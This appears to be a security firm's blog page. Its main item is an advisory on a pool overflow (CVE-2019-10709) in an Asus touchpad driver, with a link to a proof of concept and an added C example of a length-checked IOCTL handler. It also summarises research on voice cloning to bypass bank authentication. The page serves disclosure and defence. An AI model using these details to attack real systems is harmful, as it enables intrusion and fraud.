<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">TSA-2019-001: </span></b><b><span style="color: #222222; font-family: "arial"; font-size: 10.5pt;">Asus Precision TouchPad 11.0.0.25 (Pool Overflow)</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">CVE number: CVE-2019-10709</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Summary:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #2a2a2a; font-family: "arial"; font-size: 10.5pt;">The AsusPTPFilter.sys driver on the Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the </span><a href="https://www.blogger.com/null"><span style="font-family: "arial"; font-size: 10.5pt;">\\.\AsusTP</span></a><span style="color: #2a2a2a; font-family: "arial"; font-size: 10.5pt;"> device, leading to a DoS and potentially to privilege escalation via a crafted DeviceIoControl call with a specific IOCTL code.<o:p></o:p></span></div>
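The advisory does not state the root cause, so the following added example (not code from AsusPTPFilter.sys or from the linked PoC) assumes the common form of this bug class: an IOCTL handler that copies a caller-supplied length into a fixed-size pool allocation. The control code, structure names and sizes are hypothetical; the program runs in user mode, with a guard region standing in for the adjacent pool chunk, and shows the length check that keeps the copy inside the allocation.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* All names and values below are hypothetical; none come from AsusPTPFilter.sys. */
#define IOCTL_EXAMPLE_SET_CONFIG 0x222004u /* constructed control code */
#define CONFIG_BLOCK_SIZE 64u              /* size of the fixed "pool" block */
#define GUARD_SIZE 16u                     /* stands in for the adjacent pool chunk */
#define GUARD_BYTE 0xA5

enum status { ST_OK = 0, ST_INVALID_REQUEST = -1, ST_BAD_LENGTH = -2, ST_NO_MEMORY = -3 };

/* What a handler sees for one DeviceIoControl call. In a WDM driver the
 * length arrives in Parameters.DeviceIoControl.InputBufferLength and is
 * fully controlled by the caller. */
struct ioctl_request {
    uint32_t code;
    const void *in_buf;
    size_t in_len;
};

struct device_state {
    uint8_t *block;   /* CONFIG_BLOCK_SIZE bytes followed by the guard */
    size_t block_len; /* usable size, excluding the guard */
};

int device_init(struct device_state *dev)
{
    dev->block = malloc(CONFIG_BLOCK_SIZE + GUARD_SIZE);
    if (dev->block == NULL)
        return ST_NO_MEMORY;
    dev->block_len = CONFIG_BLOCK_SIZE;
    memset(dev->block, 0, CONFIG_BLOCK_SIZE);
    memset(dev->block + CONFIG_BLOCK_SIZE, GUARD_BYTE, GUARD_SIZE);
    return ST_OK;
}

void device_free(struct device_state *dev)
{
    free(dev->block);
    dev->block = NULL;
    dev->block_len = 0;
}

/* Returns 1 while the bytes after the block are untouched. */
int guard_intact(const struct device_state *dev)
{
    for (size_t i = 0; i < GUARD_SIZE; i++)
        if (dev->block[CONFIG_BLOCK_SIZE + i] != GUARD_BYTE)
            return 0;
    return 1;
}

/* Number of bytes an unchecked memcpy(dev->block, in_buf, in_len) would
 * write past the allocation. Computed only; no out-of-bounds copy is made. */
size_t overflow_if_unchecked(const struct device_state *dev,
                             const struct ioctl_request *req)
{
    return req->in_len > dev->block_len ? req->in_len - dev->block_len : 0;
}

/* Hardened dispatch: unknown codes are rejected, and the caller's length is
 * validated against the destination size before any byte is copied. */
int handle_ioctl(struct device_state *dev, const struct ioctl_request *req)
{
    if (dev == NULL || dev->block == NULL || req == NULL)
        return ST_INVALID_REQUEST;

    switch (req->code) {
    case IOCTL_EXAMPLE_SET_CONFIG:
        if (req->in_buf == NULL || req->in_len == 0 ||
            req->in_len > dev->block_len)
            return ST_BAD_LENGTH;
        memcpy(dev->block, req->in_buf, req->in_len);
        return ST_OK;
    default:
        return ST_INVALID_REQUEST;
    }
}

int main(void)
{
    struct device_state dev;
    uint8_t input[256]; /* constructed sample input */
    memset(input, 0x41, sizeof input);
    if (device_init(&dev) != ST_OK)
        return 1;

    struct ioctl_request fits = { IOCTL_EXAMPLE_SET_CONFIG, input, 64 };
    struct ioctl_request oversized = { IOCTL_EXAMPLE_SET_CONFIG, input, 256 };

    printf("64-byte request:  status %d\n", handle_ioctl(&dev, &fits));
    printf("256-byte request: status %d (unchecked copy would overrun by %zu bytes)\n",
           handle_ioctl(&dev, &oversized), overflow_if_unchecked(&dev, &oversized));
    printf("guard intact: %d\n", guard_intact(&dev));
    device_free(&dev);
    return 0;
}
```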
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Vendor:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Asus</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Product:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Asus Precision TouchPad</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Version:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">11.0.0.25</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Vendor:</span></b></div>
<div class="MsoNormal" style="background-color: white; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-size: 10.5pt;"><span style="font-family: "arial";"><b><br /></b></span></span><a href="https://www.asus.com/us/News/SupportNews/" style="color: purple; font-family: Calibri;"><span style="font-family: "helvetica"; font-size: 10.5pt;">https://www.asus.com/us/News/SupportNews/</span></a><span style="font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 0.0001pt; text-align: justify;">
<a href="https://www.asus.com/" style="color: purple;"><span style="font-family: "helvetica"; font-size: 10.5pt;">https://www.asus.com/</span></a><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Proof of Concept:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<a href="https://github.com/telspacesystems/Asus-DOS" style="color: purple;">https://github.com/telspacesystems/Asus-DOS</a></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="font-family: "arial"; font-size: 10.5pt;"><o:p> </o:p></span></b><b style="font-size: 11pt;"><span style="font-family: "arial"; font-size: 10.5pt;"><o:p> </o:p></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="font-family: "arial"; font-size: 10.5pt;">Details and crash information:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh83_MqXpWNyxRUAr8Us2xCsnneojmoSFo9wp_GcvxTSv4AchzfHEvlbzSms8dkSfvSbEqvyydIWBwZ67JmsRsYEb3joFRAMoy6qc2P8fwlufyMJkJZdJSvyoxiHtKiIsWI2ZQ5pDWgJpu5/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="771" data-original-width="606" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh83_MqXpWNyxRUAr8Us2xCsnneojmoSFo9wp_GcvxTSv4AchzfHEvlbzSms8dkSfvSbEqvyydIWBwZ67JmsRsYEb3joFRAMoy6qc2P8fwlufyMJkJZdJSvyoxiHtKiIsWI2ZQ5pDWgJpu5/s320/1.png" width="251" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_G6Snhbn5NcBDhcdlLyvjjmO0QMSFE03DQQ_tYWyv2x7ZK0a96tcQ4MxZk7f6w74nq08TowTcmQbq2RN1kdP8GjuPwR-3smk7jMG-9ilKTywDktPOBcgv9kaBPLAGs_Ym1zrLKqpj0cq/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="975" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_G6Snhbn5NcBDhcdlLyvjjmO0QMSFE03DQQ_tYWyv2x7ZK0a96tcQ4MxZk7f6w74nq08TowTcmQbq2RN1kdP8GjuPwR-3smk7jMG-9ilKTywDktPOBcgv9kaBPLAGs_Ym1zrLKqpj0cq/s320/2.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPq9cd4MpGMViXy5t1BM6HQChIxg0hz4bjMrw6I2GA0mHrEyt4Zvhcjj_lV8JmAWU2-3eHOaa0NomZ5ywleSyodvTLGwWltUjPRyyChUrC8meYZyB9PvGzF3uV072RRX04hXlmoSUAlrbS/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1350" data-original-width="921" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPq9cd4MpGMViXy5t1BM6HQChIxg0hz4bjMrw6I2GA0mHrEyt4Zvhcjj_lV8JmAWU2-3eHOaa0NomZ5ywleSyodvTLGwWltUjPRyyChUrC8meYZyB9PvGzF3uV072RRX04hXlmoSUAlrbS/s320/3.png" width="218" /></a></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
</div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
</div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Vendor response:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">The vendor has patched the vulnerability and released a new version. </span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Disclosure Timeline:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">25-03-2019 – Initial Discovery</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">27-03-2019 – Vendor Notification</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">29-08-2019 – Vendor Patch</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 12pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">30-08-2019 – Public Disclosure</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Credit:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 3.75pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">This vulnerability was discovered by Athanasios Tserpelis of Telspace Systems.</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
Giving back - Child Survivors of Crime (C.S.O.C) (posted 2019-06-12)
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUbQ1sD50ptVIWhlRpQpg19QjwI5ajN8Snmg-Bpwm5Skua_Ui0I_4DqRcGTG6bBaPl7XIjkGqnJUmurJIxaG4KMXYxa-zyBPMEnqLXFy055DKGvHDz2qoYL3ixfZvV01tNM4wImIjjppN/s1600/Itweb+2019.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="432" data-original-width="605" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUbQ1sD50ptVIWhlRpQpg19QjwI5ajN8Snmg-Bpwm5Skua_Ui0I_4DqRcGTG6bBaPl7XIjkGqnJUmurJIxaG4KMXYxa-zyBPMEnqLXFy055DKGvHDz2qoYL3ixfZvV01tNM4wImIjjppN/s400/Itweb+2019.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 15.693333625793457px; margin: 0in 0in 8pt;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 15.693333625793457px; margin: 0in 0in 8pt;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: 15.693333625793457px; margin: 0in 0in 8pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-size: 11pt;">Last month (May 2019) Telspace was once again a sponsor at the ITWeb Security Summit 2019. For more information on the ITWeb Security Summit, refer to:</span><span style="font-size: 11pt;"> </span><a href="http://v2.itweb.co.za/event/itweb/security-summit-2019/" style="color: #954f72; font-size: 11pt;">http://v2.itweb.co.za/event/itweb/security-summit-2019/</a></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: 11pt;">In addition to sponsoring this local conference, Telspace proudly ran a charity initiative on the days of the summit whereby we gave out original Telspace branded t-shirts to delegates (with a twist). </span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">Every year we donate an amount to a charity for each t-shirt we give out; this year that amount was R40.00 per shirt. However, we also decided to try and give back more to the chosen charity and had a donation box at the stand. If a delegate wanted a t-shirt, a small donation (of any value) was requested in return for the t-shirt. Amazingly, thanks to the generous delegates at the summit, the donations box raised R3 296.10 over the 2 days. We thank you all for your generous contributions to this amazing initiative.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">The chosen charity for this year was Child Survivors of Crime (C.S.O.C). This wonderful charity creates a rainbow after the storm for children affected by crime. Support is individually tailored to the specific needs of each child because each one’s circumstances are unique. They offer this support via psychological, material, educational, peer and general assistance. Should you like more information on this charity and / or to assist in contributing in some way, please do not hesitate to view their website and get in touch by going to: <a href="http://childsurvivors.org.za/" style="color: #954f72;">http://childsurvivors.org.za/</a>. This is in line with the 2019 research topic of one of our Junior Analysts (Hi Delicia!).<o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">In addition to the generous R3 296.10 raised, Telspace will be donating an additional R 8 000.00 (200 shirts x R40), making a total of R11 296.10 that will be donated to this amazing charity and initiative! We would like to say a huge thank you to all of the delegates that donated and participated in this initiative as well as our staff for getting involved! <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">It should be noted that the t-shirts contain a hidden challenge. If you received a t-shirt, find the challenge, solve it and play along to see where it may take you! <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">We would like to take this opportunity to once again say thank you to our staff, everyone that visited our stand and to everyone that showed support for Telspace Systems and in particular C.S.O.C. THANK YOU!</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-67331265934190213682019-05-16T09:46:00.000+02:002019-05-16T09:46:35.103+02:00BSidesTLV - Proud Supporters<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6-ED1_AOaeWuvQLEgrz-WblzZT4B6PrOaQ3NctoLrHHFZscxViQBrjzcZUCBoibJ1e78o-TrqnULHfCBhhKTppy8l4XhHpefU8AmWATDVEfpn3Nktd20_TVLh4bgfWkxhSs-igKENMMd/s1600/websidtebanner2-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="792" data-original-width="1600" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6-ED1_AOaeWuvQLEgrz-WblzZT4B6PrOaQ3NctoLrHHFZscxViQBrjzcZUCBoibJ1e78o-TrqnULHfCBhhKTppy8l4XhHpefU8AmWATDVEfpn3Nktd20_TVLh4bgfWkxhSs-igKENMMd/s400/websidtebanner2-2.jpg" width="400" /></a></div>
<br />
<br />
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">This year, Telspace Systems had a goal of giving back as much as we could to the information security community. This ranged from internships, research, free workshops, community based sponsorships and free training.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">In line with this, we're very proud to announce that we'll be sponsoring BSides Tel Aviv 2019 (<a href="https://bsidestlv.com/">https://bsidestlv.com/</a>), which will be hosted at Tel Aviv University, Israel. We are very proud of the local community in Israel, and are happy to be supporting our friends and colleagues through our sponsorship of the conference as well as providing our Ethical Hacking 101 training course.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">It also gives us great pride and joy to announce that we will be giving back 100% of the proceeds of our workshop to the local BSides TLV community, which is in line with our 2019 goals. We hope to see more companies doing this in order to grow the information security space worldwide and give back as much as possible to our amazing industry.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">For more information about our training that we will be offering in Tel Aviv, click here:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://bsidestlv.com/workshops/ethical-hacking-101/">https://bsidestlv.com/workshops/ethical-hacking-101/</a> . </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Registration for BSides TLV can be completed at <a href="https://bsidestlv.com/register-2019/">https://bsidestlv.com/register-2019/</a> .</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">We hope to see you there!</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-21701292778257137132019-05-01T17:41:00.001+02:002022-07-13T07:09:39.283+02:00Put Words In My Mouth<div class="separator" style="clear: both; text-align: center;"><br /></div>
<br />
<div style="text-align: center;">
<b><span face=""trebuchet ms" , sans-serif">Put Words In My Mouth | Telspace Systems Intern Research</span></b><br />
<b><span face=""trebuchet ms" , sans-serif">By Amy Manià</span></b></div>
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">Money has been withdrawn from your account.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">You don’t remember making or authorising that transaction.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">When you follow up with the bank, they say you called earlier and requested the transfer – it was, after all, you speaking – right? Unbeknownst to you, your voice was stolen, and so was your money.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">With the rise of voice authentication biometrics, the opportunities to spoof them will rise too. Text-to-Speech APIs are constantly improving; for example, Google’s technology is able to create voices that are indistinguishable from recordings made by the real-life human speaker.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">Threat actors have access to a target’s voice recordings through passive channels such as YouTube videos, social media posts etc. A more active / invasive channel an attacker could use would be to compromise vulnerable IoT devices, which are becoming more commonplace throughout homes and offices. Social media posts and IoT devices would allow threat actors to listen to a voice, capture it and then manipulate it (all using free online tools).</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">So what exactly can be done with a ‘stolen’ voice? </span><span face=""trebuchet ms" , sans-serif">This research explores the vulnerabilities in IoT devices, the legal landscape surrounding these devices and the various voice cloning, authentication and recognition software currently available. The report culminates by examining the possibilities of banking fraud, by using voice-spoofing to bypass authentication and transfer funds. The report includes a demonstration of the simulated attack on a bank.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">Download the full Telspace Systems research paper, written by Amy, here: </span><br />
